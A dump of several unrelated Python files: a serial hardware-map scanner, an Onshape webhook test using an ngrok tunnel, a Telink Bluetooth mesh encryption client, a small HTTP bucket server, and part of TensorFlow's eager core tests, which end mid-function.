def scan_hw(self, persistent=False):
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = {}
s_dev['platform'] = "unknown"
s_dev['id'] = d.serial_number
s_dev['serial'] = persistent_map.get(d.device, d.device)
s_dev['product'] = d.product
s_dev['runner'] = 'unknown'
for runner, _ in self.runner_mapping.items():
products = self.runner_mapping.get(runner)
if d.product in products:
s_dev['runner'] = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev['runner'] = runner
s_dev['available'] = True
s_dev['connected'] = True
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def write_map(self, hwm_file):
# use existing map
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=SafeLoader)
hwm.sort(key=lambda x: x['serial'] or '')
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
self.detected.sort(key=lambda x: x['serial'] or '')
for d in self.detected:
for h in hwm:
if d['id'] == h['id'] and d['product'] == h['product'] and not h['connected'] and not d.get('match', False):
h['connected'] = True
h['serial'] = d['serial']
d['match'] = True
new = list(filter(lambda n: not n.get('match', False), self.detected))
hwm = hwm + new
logger.info("Registered devices:")
self.dump(hwm)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, Dumper=Dumper, default_flow_style=False)
else:
# create new file
with open(hwm_file, 'w') as yaml_file:
yaml.dump(self.detected, yaml_file, Dumper=Dumper, default_flow_style=False)
logger.info("Detected devices:")
self.dump(self.detected)
@staticmethod
def dump(hwmap=[], filtered=[], header=[], connected_only=False):
print("")
table = []
if not header:
header = ["Platform", "ID", "Serial device"]
for p in sorted(hwmap, key=lambda i: i['platform']):
platform = p.get('platform')
connected = p.get('connected', False)
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.get('id', None), p.get('serial')])
print(tabulate(table, headers=header, tablefmt="github"))
def size_report(sc):
logger.info(sc.filename)
logger.info("SECTION NAME VMA LMA SIZE HEX SZ TYPE")
for i in range(len(sc.sections)):
v = sc.sections[i]
logger.info("%-17s 0x%08x 0x%08x %8d 0x%05x %-7s" %
(v["name"], v["virt_addr"], v["load_addr"], v["size"], v["size"],
v["type"]))
logger.info("Totals: %d bytes (ROM), %d bytes (RAM)" %
(sc.rom_size, sc.ram_size))
logger.info("")
def export_tests(filename, tests):
with open(filename, "wt") as csvfile:
fieldnames = ['section', 'subsection', 'title', 'reference']
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
for test in tests:
data = test.split(".")
if len(data) > 1:
subsec = " ".join(data[1].split("_")).title()
rowdict = {
"section": data[0].capitalize(),
"subsection": subsec,
"title": test,
"reference": test
}
cw.writerow(rowdict)
else:
logger.info("{} can't be exported".format(test))
|
test_webhooks.py
|
import pytest
import socket
from requests import get
from pyngrok import ngrok
import webbrowser
from typing import Callable
from http.server import BaseHTTPRequestHandler, HTTPServer
from threading import Thread
import six
import json
import time
import queue
from onshape_client.oas import (
BTWebhookParams,
BTWebhookOptions,
BTTranslateFormatParams,
)
from onshape_client.onshape_url import OnshapeElement
import socket
from contextlib import closing
@pytest.fixture
def free_port():
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.bind(("", 0))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s.getsockname()[1]
def tunnel(port):
"""Open a tunnel and return the public URL."""
url = ngrok.connect(port=port)
return url
@pytest.fixture
def webhook_server_factory(free_port):
"""For making a server that can accept Onshape webhooks."""
servers = []
threads = []
def _webhook_server_factory():
""" Create a factory to handle webhook notifications coming in.
:param on_recieved: function callback to handle the json response from the webhook.
:return: HTTPServer: server
"""
class myHandler(BaseHTTPRequestHandler):
def __init__(self, request, client_address, server):
super().__init__(request, client_address, server)
# Holds function that deals with the request.
self.on_recieved = None
def do_POST(self):
content_length = int(self.headers["Content-Length"])
body = self.rfile.read(content_length)
unquoted_s = body.decode("utf-8")
data = json.loads(unquoted_s)
server._message_q.put(data)
# Always return a 200 response to indicate it was gotten
self.send_response(200)
self.end_headers()
def do_GET(self):
raise NotImplementedError()
class WebhookServer(HTTPServer):
def __init__(
self, server_address, RequestHandlerClass, bind_and_activate=True
):
super().__init__(server_address, RequestHandlerClass, bind_and_activate)
self._tunneled_url = None
# Used to communicate to the main thread that a message has been recieved and needs to be processed.
# The main thread is responsible for popping messages off as they are processed.
self._message_q = queue.Queue()
@property
def url(self):
return f"http://localhost:{self.server_port}"
@property
def tunneled_url(self):
if not self._tunneled_url:
self._tunneled_url = tunnel(self.server_port)
return self._tunneled_url
def wait_for_message(
self, message_predicate=lambda m: True, seconds_to_wait=5
):
""" Block progress until a certain message is received that satisfies the passed message_predicate
:param message_predicate: blocking function that takes the message and returns True
if it is the 'right one'.
:param seconds_to_wait: seconds to wait for the message. This will throw a StopIteration
if the time runs out without a valid message.
"""
start_time = time.time()
poll_time = seconds_to_wait / 100
while True:
try:
message = self._message_q.get(timeout=poll_time)
if message_predicate(message):
return
self._message_q.task_done()
except queue.Empty:
pass
if time.time() - start_time > seconds_to_wait:
raise TimeoutError()
server = WebhookServer(("localhost", free_port), myHandler)
servers.append(server)
thread = Thread(target=server.serve_forever)
thread.start()
threads.append(thread)
return server
yield _webhook_server_factory
for server, thread in zip(servers, threads):
server.shutdown()
thread.join()
def test_create_version_with_webhook(client, webhook_server_factory, new_document):
server = webhook_server_factory()
params = BTWebhookParams(
events=["onshape.model.lifecycle.createversion",],
url=server.tunneled_url,
options=BTWebhookOptions(collapse_events=False),
document_id=new_document.did,
)
client.webhooks_api.create_webhook(bt_webhook_params=params, _preload_content=False)
server.wait_for_message(
lambda m: m["event"] == "webhook.register", seconds_to_wait=30
)
new_document.make_version("new version!")
server.wait_for_message(
lambda m: m["event"] == "onshape.model.lifecycle.createversion",
seconds_to_wait=30,
)
|
telink.py
|
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Contains code derived from python-tikteck,
# Copyright 2016 Matthew Garrett <mjg59@srcf.ucam.org>
import random
import threading
import time
import binascii
import gatt
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
def hex_to_str(hex_str):
return str(bytearray([int(n, 16) for n in hex_str]))
def encrypt(key, data):
k = AES.new(bytes(reversed(key)), AES.MODE_ECB)
data = reversed(list(k.encrypt(bytes(reversed(data)))))
rev = []
for d in data:
rev.append(d)
return rev
def generate_sk(name, password, data1, data2):
name = name.ljust(16, chr(0))
password = password.ljust(16, chr(0))
key = [ord(a) ^ ord(b) for a,b in zip(name,password)]
data = data1[0:8]
data += data2[0:8]
return encrypt(key, data)
def key_encrypt(name, password, key):
name = name.ljust(16, chr(0))
password = password.ljust(16, chr(0))
data = [ord(a) ^ ord(b) for a,b in zip(name,password)]
return encrypt(key, data)
def encrypt_packet(sk, address, packet):
# print("Debug: Encrypting from ", sk, address, binascii.hexlify(bytearray(packet)))
auth_nonce = [address[0], address[1], address[2], address[3], 0x01, packet[0], packet[1], packet[2], 15, 0, 0, 0, 0, 0, 0, 0]
authenticator = encrypt(sk, auth_nonce)
for i in range(15):
authenticator[i] = authenticator[i] ^ packet[i+5]
mac = encrypt(sk, authenticator)
for i in range(2):
packet[i+3] = mac[i]
iv = [0, address[0], address[1], address[2], address[3], 0x01, packet[0], packet[1], packet[2], 0, 0, 0, 0, 0, 0, 0]
temp_buffer = encrypt(sk, iv)
for i in range(15):
packet[i+5] ^= temp_buffer[i]
# print("Debug: Encrypted ", binascii.hexlify(bytearray(packet)))
return packet
def decrypt_packet(sk, address, packet):
# print("Debug: decrypting from ", sk, address, packet, type(packet))
iv = [address[0], address[1], address[2], packet[0], packet[1], packet[2],
packet[3], packet[4], 0, 0, 0, 0, 0, 0, 0, 0]
plaintext = [0] + iv[0:15]
result = encrypt(sk, plaintext)
for i in range(len(packet)-7):
packet[i+7] ^= result[i]
# print("Debug: Decrypted ", binascii.hexlify(bytearray(packet)))
return packet
class TelinkDeviceManager(gatt.DeviceManager):
def device_discovered(self, device):
pass
# print("Discovered [%s] %s" % (device.mac_address, device.alias()))
class Peripheral(gatt.Device):
serviceResolved = False
link = None
callback = None
c_values = {}
def connect_succeeded(self):
super().connect_succeeded()
#self.serviceResolved = True # Todo: Service need not to be resolved
# print("[%s] Connected" % (self.mac_address))
def connect_failed(self, error):
super().connect_failed(error)
# print("[%s] Connection failed: %s" % (self.mac_address, str(error)))
def disconnect_succeeded(self):
super().disconnect_succeeded()
# print("[%s] Disconnected" % (self.mac_address))
def services_resolved(self):
super().services_resolved()
self.serviceResolved = True
# self.connectedCallback()
def setNotificationCallback(self, link, callback):
self.link = link
self.callback = callback
def getValue(self, characteristic):
c_uuid = str(characteristic.uuid)
value = self.c_values.get(c_uuid)
return value
def characteristic_value_updated(self, characteristic, value):
value = list(value)
c_uuid = str(characteristic.uuid)
self.c_values[c_uuid] = value
# print("Debug: Characteristic %s value update %s" % (characteristic.uuid, binascii.hexlify(bytearray(self.c_values.get(c_uuid)))))
if c_uuid == '00010203-0405-0607-0809-0a0b0c0d1911':
# print("Debug: received notication from 1911 with ", binascii.hexlify(bytearray(value)))
if self.link is not None:
# print("Debug: callback exists, decrypting received value from 1911")
decrypted = decrypt_packet(self.link.sk, self.link.macdata, value)
self.callback(self.link.mesh, decrypted)
def getCharacteristics(self, characteristic_uuid):
for s in self.services:
for c in s.characteristics:
# print("Debug: Matching characteristic %s to %s" % (c.uuid, characteristic_uuid))
if c.uuid == characteristic_uuid:
# print("Debug: Found matched charateristic ", characteristic_uuid)
return c
class telink:
def __init__(self, vendor, mac, name, password, mesh=None, callback=None):
self.vendor = vendor
self.mac = mac
if (mac is not None):
self.macarray = mac.split(':')
self.macdata = [int(self.macarray[5], 16), int(self.macarray[4], 16), int(self.macarray[3], 16), int(self.macarray[2], 16), int(self.macarray[1], 16), int(self.macarray[0], 16)]
self.name = name
self.password = password
self.callback = callback
self.mesh = mesh
self.packet_count = random.randrange(0xffff)
self.scanned = False
self.manager = TelinkDeviceManager(adapter_name='hci0')
self.manager.is_adapter_powered = True
thread = threading.Thread(target=self.startManager)
thread.daemon = True
thread.start()
def startManager(self):
if (self.manager is None):
print("Error: Device manager not defined!")
else:
# print("Debug: Thread starting manager")
self.manager.run()
def stopManager(self):
if (self.manager is None):
print("Error: Device manager not defined!")
else:
# print("Debug: Thread stopping manager")
self.manager.stop()
def set_sk(self, sk):
self.sk = sk
def registerConnectableDevices(self, scanTime = 10):
# print("Debug: registering devices")
self.manager.start_discovery()
time.sleep(scanTime)
self.manager.stop_discovery()
self.devices = self.manager.devices()
self.scanned = True
def disconnect(self):
if (self.mac is not None):
self.device.disconnect()
def connect(self, mac):
self.mac = mac
self.macarray = mac.split(':')
self.macdata = [int(self.macarray[5], 16), int(self.macarray[4], 16), int(self.macarray[3], 16), int(self.macarray[2], 16), int(self.macarray[1], 16), int(self.macarray[0], 16)]
# print("Debug: connecting to %s" % self.mac)
if (not self.scanned):
# print("Debug: no device have registered")
self.registerConnectableDevices()
lt = time.monotonic()
while (time.monotonic() - lt < 15):
time.sleep(0.5)
if (self.scanned):
break
if (self.scanned):
self.device = Peripheral(mac_address = self.mac, manager = self.manager)
# self.device.setConnectedCallback(callback = onConnected)
self.device.connect()
# print("Debug: waiting for service to resolve")
lt = time.monotonic()
while (time.monotonic() - lt < 5):
time.sleep(0.2)
if (self.device.serviceResolved):
break
if (self.device.serviceResolved):
# def onConnected(self):
# print("Debug: all services resolved")
self.notification = self.device.getCharacteristics("00010203-0405-0607-0809-0a0b0c0d1911")
if self.notification:
self.notification.enable_notifications()
else:
print("Exception: device has no notification")
return None
self.control = self.device.getCharacteristics("00010203-0405-0607-0809-0a0b0c0d1912")
self.pairing = self.device.getCharacteristics("00010203-0405-0607-0809-0a0b0c0d1914")
data = [0] * 16
random_data = get_random_bytes(8)
for i in range(8):
data[i] = random_data[i]
enc_data = key_encrypt(self.name, self.password, data)
packet = [0x0c]
packet += data[0:8]
packet += enc_data[0:8]
self.pairing.write_value(bytes(packet))
time.sleep(1)
self.pairing.c_value = None
lt = time.monotonic()
data2 = None
self.pairing.read_value()
while time.monotonic() - lt < 5 and data2 is None:
data2 = self.device.getValue(self.pairing)
time.sleep(0.1)
if data2 is None:
print("Exception: unable to connect")
return None
self.sk = generate_sk(self.name, self.password, data[0:8], data2[1:9])
# print("Debug: sk, mac, macdata: ", self.sk, self.mac, self.macdata)
if self.callback is not None:
# print("Debug: setting notification call back")
self.device.setNotificationCallback(self, self.callback)
self.notification.write_value(bytes([0x1]))
else:
print("Warning: no service resolved for %s" % self.device.alias())
return self.device
else:
print("Error: scanning failed, check BT hardware!")
return None
def send_packet(self, target, command, data):
packet = [0] * 20
packet[0] = self.packet_count & 0xff
packet[1] = self.packet_count >> 8 & 0xff
packet[5] = target & 0xff
packet[6] = (target >> 8) & 0xff
packet[7] = command
packet[8] = self.vendor & 0xff
packet[9] = (self.vendor >> 8) & 0xff
for i in range(len(data)):
packet[10 + i] = data[i]
# print("send_packet verify plain: ", binascii.hexlify(bytearray(bytes(packet))))
enc_packet = encrypt_packet(self.sk, self.macdata, packet)
# print("send_packet verify encrypted: ", binascii.hexlify(bytearray(bytes(enc_packet))))
self.packet_count += 1
if self.packet_count > 65535:
self.packet_count = 1
# BLE connections may not be stable. Spend up to 10 seconds trying to
# reconnect before giving up.
initial = time.monotonic()
while True:
if time.monotonic() - initial >= 10:
# raise Exception("Unable to connect")
print("Write failed")
break
try:
self.control.write_value(bytes(enc_packet))
break
except:
self.connect()
|
bucketserver.py
|
# -*- coding: utf-8 -*-
"""
bucketserver
Simple web service for image
Copyright (c) 2017 - RocketRedNeck.com RocketRedNeck.net
RocketRedNeck and MIT Licenses
RocketRedNeck hereby grants license for others to copy and modify this source code for
whatever purpose other's deem worthy as long as RocketRedNeck is given credit where
where credit is due and you leave RocketRedNeck out of it for all other nefarious purposes.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
****************************************************************************************************
"""
# import the necessary packages
import cv2
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
from threading import Thread
class BucketServer:
def __init__(self,name,httpserver):
self.name= name
self.server = httpserver
print("Creating BuckerServer for " + self.name)
# initialize the variable used to indicate if the thread should
# be stopped
self._stop = False
self.stopped = True
print("BucketServerImageProcessor created for " + self.name)
def start(self):
print("STARTING BucketServer for " + self.name)
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
print("BuckerServer for " + self.name + " RUNNING")
self.stopped = False
self.server.serve_forever() # Until shutdown is commanded
self._stop = False
self.stopped = True
print("BucketServer for " + self.name + " STOPPING")
def stop(self):
# indicate that the thread should be stopped
self._stop = True
self.server.shutdown()
def isStopped(self):
return self.stopped
|
core_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for core."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import pickle
import threading
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.compat import compat
from tensorflow.python.eager import context
from tensorflow.python.eager import core
from tensorflow.python.eager import def_function
from tensorflow.python.eager import execute as execute_lib
from tensorflow.python.eager import executor
from tensorflow.python.eager import test
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_resource_variable_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import variables
def execute(op_name, num_outputs, inputs, attrs=None):
return execute_lib.execute(
op_name, num_outputs, inputs, attrs, context.context())
def truncated_normal(shape):
return execute(
b'TruncatedNormal',
1,
inputs=[shape],
attrs=('dtype', dtypes.float32.as_datatype_enum, 'T',
shape.dtype.as_datatype_enum, 'seed', 0, 'seed2', 0))[0]
def current_device():
return constant_op.constant(1.).device
def configure_virtual_cpus():
cpus = config.list_physical_devices('CPU')
# Set 2 virtual CPUs
config.set_virtual_device_configuration(cpus[0], [
context.VirtualDeviceConfiguration(),
context.VirtualDeviceConfiguration()
])
class TFETest(test_util.TensorFlowTestCase):
def setUp(self):
super(TFETest, self).setUp()
configure_virtual_cpus()
def _test_hashable(self, a, b, hashable):
if hashable:
self.assertIsInstance(b, collections.Hashable)
self.assertLen(set([a, b]), 2)
else:
# TODO(gjn): Figure out how to make this work for tf.Tensor
# self.assertNotIsInstance(b, collections.Hashable)
with self.assertRaisesRegexp(TypeError, 'unhashable'):
set([a, b])
def testEquality(self):
default = ops.Tensor._USE_EQUALITY
try:
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(1.0)
constant_b = constant_op.constant(1.0)
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(1.0)
variable_b = variables.Variable(1.0)
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, False)
# We only test numpy behaviour in v2 mode since we'd like to match that.
numpy_a = np.array(1.0)
numpy_b = np.array(1.0)
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityNan(self):
default = ops.Tensor._USE_EQUALITY
try:
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertNotEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(float('nan'))
constant_b = constant_op.constant(float('nan'))
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(float('nan'))
variable_b = variables.Variable(float('nan'))
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, False)
numpy_a = np.array(float('nan'))
numpy_b = np.array(float('nan'))
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityCompare(self):
default = ops.Tensor._USE_EQUALITY
try:
tf_a = constant_op.constant([1, 2])
tf_b = constant_op.constant([1, 2])
tf_c = constant_op.constant([1, 1])
np_a = np.array([1, 2])
np_b = np.array([1, 2])
np_c = np.array([1, 1])
ops.disable_tensor_equality()
# We don't do element-wise comparison
self.assertNotEqual(tf_a, tf_b)
self.assertNotEqual(tf_a, tf_c)
# We can compare list of tensors
self.assertEqual([tf_a, tf_b], [tf_a, tf_b])
self.assertNotEqual([tf_a, tf_b], [tf_b, tf_b])
# We can compare existence in a list
self.assertIn(tf_a, [tf_a, tf_b])
self.assertIn(tf_a, [tf_b, tf_a])
self.assertNotIn(tf_a, [tf_b, tf_c])
ops.enable_tensor_equality()
# We do element-wise comparison but can't convert results array to bool
with self.assertRaises(ValueError):
bool(tf_a == tf_b)
self.assertAllEqual(tf_a == tf_b, [True, True])
with self.assertRaises(ValueError):
bool(tf_a == tf_c)
self.assertAllEqual(tf_a == tf_c, [True, False])
self.assertNotAllEqual(tf_a, tf_c)
with self.assertRaises(ValueError):
bool(np_a == np_b)
self.assertAllEqual(np_a == np_b, [True, True])
with self.assertRaises(ValueError):
bool(np_a == np_c)
self.assertAllEqual(np_a == np_c, [True, False])
self.assertNotAllEqual(np_a, np_c)
# Warning even though we technically shouldn't be able to compare here,
# since the id is the same both TF & numpy will handle lists with the same
# value without raising an error
self.assertEqual([tf_a, tf_b], [tf_a, tf_b])
with self.assertRaises(ValueError):
bool([tf_a, tf_b] == [tf_b, tf_b])
self.assertEqual([np_a, np_b], [np_a, np_b])
with self.assertRaises(ValueError):
bool([np_a, np_b] == [np_b, np_b])
# Similar to lists we shouldn't be able to do a `in` check such as
# `if a in [a,b]`. However if `a` is the first element, it works due to
# short circuiting
self.assertIn(tf_a, [tf_a, tf_b])
with self.assertRaises(ValueError):
bool(tf_a in [tf_b, tf_a])
with self.assertRaises(ValueError):
bool(tf_a in [tf_b, tf_c])
self.assertIn(np_a, [np_a, np_b])
with self.assertRaises(ValueError):
bool(np_a in [np_b, np_a])
with self.assertRaises(ValueError):
bool(np_a in [np_b, np_c])
# rank 0
self.assertAllEqual(
constant_op.constant(1) == constant_op.constant(1), True)
self.assertAllEqual(
constant_op.constant(1) == constant_op.constant(2), False)
self.assertAllEqual(np.array(1) == np.array(1), True)
self.assertAllEqual(np.array(1) == np.array(2), False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityBroadcast(self):
default = ops.Tensor._USE_EQUALITY
try:
tf_a = constant_op.constant([1, 1])
tf_b = constant_op.constant([1, 1])
tf_c = constant_op.constant([[1, 1], [1, 1]])
tf_d = constant_op.constant([[1, 2], [1, 2]])
tf_e = constant_op.constant([1, 1, 1])
np_a = np.array([1, 1])
np_b = np.array([1, 1])
np_c = np.array([[1, 1], [1, 1]])
np_d = np.array([[1, 2], [1, 2]])
np_e = np.array([1, 1, 1])
ops.disable_tensor_equality()
# We don't do element-wise comparison
self.assertNotEqual(tf_a, tf_b)
self.assertNotEqual(tf_a, tf_c)
self.assertNotEqual(tf_a, tf_d)
ops.enable_tensor_equality()
# We do element-wise comparison but can't convert results array to bool
with self.assertRaises(ValueError):
bool(tf_a == tf_b)
self.assertAllEqual(tf_a == tf_b, [True, True])
with self.assertRaises(ValueError):
bool(tf_a == tf_c)
self.assertAllEqual(tf_a == tf_c, [[True, True], [True, True]])
with self.assertRaises(ValueError):
bool(tf_a == tf_d)
self.assertAllEqual(tf_a == tf_d, [[True, False], [True, False]])
if compat.forward_compatible(2019, 9, 25):
self.assertFalse(bool(tf_a == tf_e))
self.assertTrue(bool(tf_a != tf_e))
self.assertNotAllEqual(tf_a, tf_e)
else:
with self.assertRaises(errors.InvalidArgumentError):
bool(tf_a != tf_e)
with self.assertRaises(ValueError):
bool(np_a == np_b)
self.assertAllEqual(np_a == np_b, [True, True])
with self.assertRaises(ValueError):
bool(np_a == np_c)
self.assertAllEqual(np_a == np_c, [[True, True], [True, True]])
self.assertAllEqual(np_a == np_d, [[True, False], [True, False]])
self.assertFalse(bool(np_a == np_e))
self.assertTrue(bool(np_a != np_e))
self.assertNotAllEqual(np_a, np_e)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testContext(self):
ctx = context.Context()
self.assertTrue(ctx.executing_eagerly())
self.assertEqual('', ctx.scope_name)
ctx.scope_name = 'foo'
self.assertEqual('foo', ctx.scope_name)
self.assertEqual(context.SYNC, ctx.execution_mode)
ctx.execution_mode = context.ASYNC
self.assertEqual(context.ASYNC, ctx.execution_mode)
ctx.execution_mode = context.SYNC
self.assertEqual(context.SYNC, ctx.execution_mode)
self.assertIsNone(ctx.summary_writer)
ctx.summary_writer = 'mock'
self.assertEqual('mock', ctx.summary_writer)
self.assertIsNone(ctx.summary_recording)
ctx.summary_recording = 'mock'
self.assertEqual('mock', ctx.summary_recording)
self.assertIsNone(ctx.summary_step)
ctx.summary_step = 'mock'
self.assertEqual('mock', ctx.summary_step)
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('GPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(None):
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('CPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testAsyncBasic(self):
ctx = context.Context(execution_mode=context.ASYNC)
ctx.ensure_initialized()
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testRunMetadata(self):
context.enable_run_metadata()
t = constant_op.constant(1.0)
_ = t + t # Runs an operation which will be in the RunMetadata
run_metadata = context.export_run_metadata()
context.disable_run_metadata()
step_stats = run_metadata.step_stats
self.assertGreater(len(step_stats.dev_stats), 0)
cpu_stats = step_stats.dev_stats[0]
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
cpu_stats.device)
self.assertGreaterEqual(len(cpu_stats.node_stats), 1)
def testMultiCpuPlacement(self):
with ops.device('cpu:1'):
x = constant_op.constant(1.0)
y = array_ops.identity(x)
self.assertEqual(x.device, '/job:localhost/replica:0/task:0/device:CPU:1')
self.assertEqual(y.device, '/job:localhost/replica:0/task:0/device:CPU:0')
@test_util.run_gpu_only
def testShouldCopy(self):
with ops.device('gpu:0'):
x = constant_op.constant(1.0)
y = array_ops.identity(x)
# The value we're testing y.device against will depend on what the behavior
# of not explicitly specifying a device in the context is. This behavior is
# subject to change (for example, in the future we may want to use GPUs, if
# available, when no device is explicitly provided)
self.assertEqual(y.device, '/job:localhost/replica:0/task:0/device:CPU:0')
def testContextSwitchStackContainsEagerMode(self):
# Eager execution has been enabled, and no other context switch has
# occurred, so `context_switches` should contain exactly one entry.
self.assertEqual(len(context.context().context_switches.stack), 1)
switch = context.context().context_switches.stack[0]
# The entry should log that eager mode was entered.
self.assertIs(switch.enter_context_fn, context.eager_mode)
# It is not possible to build a graph function when eager execution
# is enabled; the stack entry should reflect this fact.
self.assertFalse(switch.is_building_function)
@test_util.run_gpu_only
def testInt32GPU(self):
with ops.device('gpu:0'):
xent = nn_ops.sparse_softmax_cross_entropy_with_logits(
logits=[[0.0, 0.0]], labels=[0])
self.assertAllClose(xent, [0.69314718])
def _runInThread(self, target, args):
t = threading.Thread(target=target, args=args)
try:
t.start()
t.join()
except Exception as e:
raise e
# Test that different thread local values are initialized to the same values
# in different threads.
def testContextThreadLocalMembers(self):
def get_context_values(ctx):
return [
ctx.executing_eagerly(),
ctx.scope_name,
ctx.summary_writer,
